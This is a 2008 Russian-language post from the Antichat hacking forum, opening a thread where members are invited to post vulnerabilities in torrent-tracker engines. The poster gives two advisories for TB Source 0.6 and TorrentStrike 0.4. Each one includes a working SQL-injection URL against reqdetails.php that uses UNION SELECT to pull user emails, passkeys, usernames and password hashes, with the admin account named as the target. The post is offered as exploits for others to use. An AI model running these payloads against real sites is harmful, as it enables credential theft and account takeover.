Форум АНТИЧАТ - Уязвимости движков трэкеров

Уязвимости движков трэкеров

11.05.2008, 14:11

z01b

Постоянный

Регистрация: 05.01.2007

Сообщений: 508

Провел на форуме:
2360904

Репутация: 1393

Уязвимости движков трэкеров

Здесь выкладываем уязвимости трэкер-движков.

Я пожалую начну. Уязвимости готовил уже давно на milw0rm-e выкладывать но руки так и не дошли.

TB Source <= 0.6

Код:

#######################################
# TB Source <= 0.6 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/tbsource/
# Vulnerable File : reqdetails.php
--------------------------------------------------


Vulnerability:

SQL-injection to obtain admin user and hash

http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06

TorrentStrike <= 0.4

Код:

#######################################
# Torrent Strike <= 0.4 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/torrentstrike/
# Vulnerable File : reqdetails.php
--------------------------------------------------

SQL querry, for recieving admin user and hash(md5):

http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06

Последний раз редактировалось z01b; 11.05.2008 в 14:23..